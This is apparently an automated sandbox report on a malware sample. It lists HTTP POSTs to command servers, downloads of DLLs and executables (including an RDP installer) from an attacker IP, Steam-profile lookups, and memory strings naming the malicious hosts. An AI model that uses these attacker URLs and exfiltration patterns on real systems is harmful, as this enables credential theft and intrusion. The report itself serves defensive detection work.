Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFIIIJJKJKFHIDGDBAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCBAKJEHDBGHIEBGCGDGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKFIECBGDHJKECAKFBGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJDHDAECBGCAKEBAEBAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 113909Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIDAKECFIEBGDHJEBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: wallkedsleeoi.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gutterydhowi.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ghostreedmnu.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGHJJEHDHCAAKFIIDGIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: offensivedzvju.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIEGDBKJKEBGCBAFCFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: vozmeatillu.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawzhotdog.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBFBKFBGIIIDGDGCFCGIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fragnantbui.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stogeneratmns.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: reinforcenh.shop
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ballotnwu.site
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKEBGCGHIDHCBFHIDGHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGHCFIDAKJEBGCAFBAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDBAFIIECBFHIEBKJJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKEHJEGCFBFHJJKJEHDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 6345Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHDAEHDAKECGCAKFCFIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5dbaca34ac_lfdnsafnds.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5db9e54794_vfkagks.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5de72d9ebd_rdp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJECAEHJJJKJKFIDGCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: cowod.hopto.orgContent-Length: 3189Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 6_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

6_2_00406963

Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5dbaca34ac_lfdnsafnds.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5db9e54794_vfkagks.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5de72d9ebd_rdp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1Host: 147.45.44.104Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org

Source: RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: wallkedsleeoi.shop
Source: global traffic	DNS traffic detected: DNS query: gutterydhowi.shop
Source: global traffic	DNS traffic detected: DNS query: ghostreedmnu.shop
Source: global traffic	DNS traffic detected: DNS query: offensivedzvju.shop
Source: global traffic	DNS traffic detected: DNS query: vozmeatillu.shop
Source: global traffic	DNS traffic detected: DNS query: drawzhotdog.shop
Source: global traffic	DNS traffic detected: DNS query: fragnantbui.shop
Source: global traffic	DNS traffic detected: DNS query: stogeneratmns.shop
Source: global traffic	DNS traffic detected: DNS query: cowod.hopto.org
Source: global traffic	DNS traffic detected: DNS query: reinforcenh.shop
Source: global traffic	DNS traffic detected: DNS query: ballotnwu.site
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: hansgborn.eu

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIDAKECFIEBGDHJEBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 256Connection: Keep-AliveCache-Control: no-cache

Source: RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: CFHIIEHJKK.exe, 00000014.00000002.2475649051.00000000030A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104
Source: CFHIIEHJKK.exe, 00000014.00000002.2475649051.00000000030A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
Source: RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2061826674.000000000117A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2061826674.000000000125F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5db9e54794_vfkagks.exe
Source: RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5db9e54794_vfkagks.exem-data;
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2061826674.000000000117A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe
Source: RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe1kkkk1221987http://147.45.44.104/prog/66f5db9e
Source: RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exeata;
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exed
Source: RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2061826674.000000000117A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5de72d9ebd_rdp.exe
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5de72d9ebd_rdp.exev
Source: file.exe, 66f5db9e54794_vfkagks[1].exe.6.dr, BKKFCFBKFC.exe.6.dr, GIEHJDHCBA.exe.6.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.6.dr	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: CFHIIEHJKK.exe, 00000014.00000002.2475649051.00000000035DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipi4
Source: CFHIIEHJKK.exe, 00000014.00000002.2475649051.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, CFHIIEHJKK.exe, 00000014.00000002.2475649051.00000000030F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org
Source: CFHIIEHJKK.exe, 00000014.00000002.2475649051.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, CFHIIEHJKK.exe, 00000014.00000002.2475649051.00000000030F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/
Source: CFHIIEHJKK.exe, 00000014.00000002.2475649051.00000000035EF000.00000004.00000800.00020000.00000000.sdmp, CFHIIEHJKK.exe, 00000014.00000002.2475649051.00000000035DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.orgd
Source: CFHIIEHJKK.exe, 00000014.00000002.2475649051.00000000035DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify86z
Source: RegAsm.exe, 00000006.00000002.2077927206.0000000020816000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2084316786.000000002678A000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: RegAsm.exe, 00000006.00000002.2077927206.0000000020816000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2084316786.000000002678A000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: RegAsm.exe, 00000006.00000002.2077927206.0000000020816000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2084316786.000000002678A000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe, 66f5db9e54794_vfkagks[1].exe.6.dr, BKKFCFBKFC.exe.6.dr, GIEHJDHCBA.exe.6.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.6.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: RegAsm.exe, 00000006.00000002.2077927206.0000000020816000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2084316786.000000002678A000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: RegAsm.exe, 00000006.00000002.2077927206.0000000020816000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2084316786.000000002678A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 66f5db9e54794_vfkagks[1].exe.6.dr, mozglue.dll.6.dr, BKKFCFBKFC.exe.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr, GIEHJDHCBA.exe.6.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.6.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.KJKEBGCBAFCF
Source: RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto
Source: RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.
Source: RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.CBAFCF
Source: RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org
Source: RegAsm.exe, 00000006.00000002.2061826674.0000000001379000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org/
Source: RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.orgFCF
Source: file.exe, 00000002.00000002.1334300734.00000000041F5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hoptoGCBAFCF
